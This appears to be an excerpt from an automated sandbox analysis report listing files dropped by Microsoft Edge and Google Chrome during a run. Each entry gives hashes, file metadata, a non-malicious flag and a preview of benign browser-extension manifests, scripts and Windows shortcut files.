                                                                                                                                                                                                                                                                                                                                    Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):854
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                                    MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                                    SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                                    SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                                    SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2525
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                                                    MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                                                    SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                                                    SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                                                    SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                                    MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                                    SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                                    SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                                    SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):122218
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                                                    MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                                                    SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                                                    SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                                                    SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):291
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                                    MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                                    SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                                    SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                                    SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):130866
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                                                    MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                                                    SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                                                    SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                                                    SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1753
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                                    MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                                    SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                                    SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                                    SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):9815
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                                    MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                                    SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                                    SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                                    SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):10388
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                                    MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                                    SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                                    SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                                    SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                                    MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                                    SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                                    SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                                    SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 07:46:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.980750231210393
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:8edjTLLTHUidAKZdA19ehwiZUklqehsJy+3:8eLmBJy
                                                                                                                                                                                                                                                                                                                                    MD5:1C28F2F01AA909C0264C0E0F7E196139
                                                                                                                                                                                                                                                                                                                                    SHA1:12FBBE7A1D67FC9A3537D3879F23A6A7D9F9DCBA
                                                                                                                                                                                                                                                                                                                                    SHA-256:6ACF6B7952AEE95A94A7E14908054C222932C4F92F0622F24670E7A2184E077F
                                                                                                                                                                                                                                                                                                                                    SHA-512:37FE8F599D5612709D966D1A7202C1B18F27E098438CC0EFC1527259CEAD8AB34EED0303ACF67AD85F82C5D5934BDDDC547A349E94B5CBA9B2E6351E15CD6BB8
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....]t`[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.E....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............l.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 07:46:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.99218291472055
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:8UdjTLLTHUidAKZdA1weh/iZUkAQkqehxJy+2:8MLk9Q+Jy
                                                                                                                                                                                                                                                                                                                                    MD5:1F0585B92914B4CED51F84BC91F07F4A
                                                                                                                                                                                                                                                                                                                                    SHA1:12A4763DDA36F9780FEF017CFA1D42D35382C6A0
